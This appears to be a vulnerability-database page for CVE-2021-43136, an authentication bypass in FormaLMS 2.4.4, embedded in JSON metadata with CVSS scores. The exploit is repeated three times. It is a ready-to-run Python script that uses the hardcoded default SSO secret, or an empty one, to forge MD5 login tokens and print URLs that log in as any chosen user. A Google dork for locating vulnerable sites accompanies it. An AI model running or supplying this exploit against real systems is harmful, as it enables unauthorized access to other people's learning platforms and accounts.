FormaLMS 2.4.4 Authentication Bypass

2021-11-11T00:00:00

Description

{"id": "PACKETSTORM:164930", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "FormaLMS 2.4.4 Authentication Bypass", "description": "", "published": "2021-11-11T00:00:00", "modified": "2021-11-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/164930/FormaLMS-2.4.4-Authentication-Bypass.html", "reporter": "Cristian Giustini", "references": [], "cvelist": ["CVE-2021-43136"], "immutableFields": [], "lastseen": "2021-11-11T17:15:32", "viewCount": 192, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-43136"]}, {"type": "exploitdb", "idList": ["EDB-ID:50513"]}, {"type": "zdt", "idList": ["1337DAY-ID-37031"]}], "rev": 4}, "score": {"value": 5.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-43136"]}, {"type": "exploitdb", "idList": ["EDB-ID:50513"]}, {"type": "zdt", "idList": ["1337DAY-ID-37031"]}]}, "exploitation": null, "vulnersScore": 5.6}, "sourceHref": "https://packetstormsecurity.com/files/download/164930/formalms244-bypass.txt", "sourceData": "`# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass \n# Google Dork: inurl:index.php?r=adm/ \n# Date: 2021-11-10 \n# Exploit Author: Cristian 'void' Giustini @ Hacktive Security \n# Vendor Homepage: https://formalms.org \n# Software Link: https://formalms.org \n# Version: <= 2.4.4 \n# Tested on: Linux \n# CVE : CVE-2021-43136 \n \n# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform. \n \n# Analysis: \nhttps://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/ \n \n# Nuclei template: \nhttps://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml \n \n#!/usr/bin/env python \n \n\"\"\" \n \nThe following exploit generates two URLs with empty and fixed value of the \"secret\". In order to achieve a successful exploitation the \"Enable SSO with a third party software through a token\" setting needs to be enabled \n \n\"\"\" \n \nimport sys \nimport time \nimport hashlib \n \nsecret = \"8ca0f69afeacc7022d1e589221072d6bcf87e39c\" \n \ndef help(): \n \nprint(f\"Usage: {sys.argv[0]} username target_url\") \n \nsys.exit() \n \n \nif len(sys.argv) < 3: \n \nhelp() \n \nuser, url = (sys.argv[1], sys.argv[2]) \nt = str(int(time.time()) + 5000) \ntoken = hashlib.md5(f\"{user},{t},{secret}\".encode()).hexdigest().upper() \nfinal_url = f\"{url}/index.php?login_user={user}&time={t}&token={token}\" \nprint(f\"URL with default secret: {final_url}\") \ntoken = hashlib.md5(f\"{user},{t},\".encode()).hexdigest().upper() \nfinal_url = f\"{url}/index.php?login_user={user}&time={t}&token={token}\" \nprint(f\"URL with empty secret: {final_url}\") \n \n \n`\n", "_state": {"dependencies": 1646419291}}

{"cve": [{"lastseen": "2022-03-23T19:38:27", "description": "An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T12:15:00", "type": "cve", "title": "CVE-2021-43136", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43136"], "modified": "2021-11-15T14:18:00", "cpe": ["cpe:/a:formalms:formalms:2.4.4"], "id": "CVE-2021-43136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43136", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:formalms:formalms:2.4.4:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2021-12-03T01:48:57", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "zdt", "title": "FormaLMS 2.4.4 - Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43136"], "modified": "2021-11-11T00:00:00", "id": "1337DAY-ID-37031", "href": "https://0day.today/exploit/description/37031", "sourceData": "# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass\n# Google Dork: inurl:index.php?r=adm/\n# Exploit Author: Cristian 'void' Giustini @ Hacktive Security\n# Vendor Homepage: https://formalms.org\n# Software Link: https://formalms.org\n# Version: <= 2.4.4\n# Tested on: Linux\n# CVE : CVE-2021-43136\n\n# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform.\n\n# Analysis:\nhttps://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/\n\n# Nuclei template:\nhttps://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml\n\n#!/usr/bin/env python\n\n\"\"\"\n\nThe following exploit generates two URLs with empty and fixed value of the \"secret\". In order to achieve a successful exploitation the \"Enable SSO with a third party software through a token\" setting needs to be enabled\n\n\"\"\"\n\nimport sys\nimport time\nimport hashlib\n\nsecret = \"8ca0f69afeacc7022d1e589221072d6bcf87e39c\" \n\n def help():\n\n print(f\"Usage: {sys.argv[0]} username target_url\")\n\n sys.exit()\n\n \nif len(sys.argv) < 3:\n\n help()\n\nuser, url = (sys.argv[1], sys.argv[2])\nt = str(int(time.time()) + 5000)\ntoken = hashlib.md5(f\"{user},{t},{secret}\".encode()).hexdigest().upper()\nfinal_url = f\"{url}/index.php?login_user={user}&time={t}&token={token}\"\nprint(f\"URL with default secret: {final_url}\")\ntoken = hashlib.md5(f\"{user},{t},\".encode()).hexdigest().upper()\nfinal_url = f\"{url}/index.php?login_user={user}&time={t}&token={token}\"\nprint(f\"URL with empty secret: {final_url}\")\n", "sourceHref": "https://0day.today/exploit/37031", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:34:30", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "exploitdb", "title": "FormaLMS 2.4.4 - Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-43136", "CVE-2021-43136"], "modified": "2021-11-11T00:00:00", "id": "EDB-ID:50513", "href": "https://www.exploit-db.com/exploits/50513", "sourceData": "# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass\r\n# Google Dork: inurl:index.php?r=adm/\r\n# Date: 2021-11-10\r\n# Exploit Author: Cristian 'void' Giustini @ Hacktive Security\r\n# Vendor Homepage: https://formalms.org\r\n# Software Link: https://formalms.org\r\n# Version: <= 2.4.4\r\n# Tested on: Linux\r\n# CVE : CVE-2021-43136\r\n\r\n# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform.\r\n\r\n# Analysis:\r\nhttps://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/\r\n\r\n# Nuclei template:\r\nhttps://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml\r\n\r\n#!/usr/bin/env python\r\n\r\n\"\"\"\r\n\r\nThe following exploit generates two URLs with empty and fixed value of the \"secret\". In order to achieve a successful exploitation the \"Enable SSO with a third party software through a token\" setting needs to be enabled\r\n\r\n\"\"\"\r\n\r\nimport sys\r\nimport time\r\nimport hashlib\r\n\r\nsecret = \"8ca0f69afeacc7022d1e589221072d6bcf87e39c\" \r\n\r\n def help():\r\n\r\n print(f\"Usage: {sys.argv[0]} username target_url\")\r\n\r\n sys.exit()\r\n\r\n \r\nif len(sys.argv) < 3:\r\n\r\n help()\r\n\r\nuser, url = (sys.argv[1], sys.argv[2])\r\nt = str(int(time.time()) + 5000)\r\ntoken = hashlib.md5(f\"{user},{t},{secret}\".encode()).hexdigest().upper()\r\nfinal_url = f\"{url}/index.php?login_user={user}&time={t}&token={token}\"\r\nprint(f\"URL with default secret: {final_url}\")\r\ntoken = hashlib.md5(f\"{user},{t},\".encode()).hexdigest().upper()\r\nfinal_url = f\"{url}/index.php?login_user={user}&time={t}&token={token}\"\r\nprint(f\"URL with empty secret: {final_url}\")", "sourceHref": "https://www.exploit-db.com/download/50513", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}

FormaLMS 2.4.4 Authentication Bypass

Description

Related